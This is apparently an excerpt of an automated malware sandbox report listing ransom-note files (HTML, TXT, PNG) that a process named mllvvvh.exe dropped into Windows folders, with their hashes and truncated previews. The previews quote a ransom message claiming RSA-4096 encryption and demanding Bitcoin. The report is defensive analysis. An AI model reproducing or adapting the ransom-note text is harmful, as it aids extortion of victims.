                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
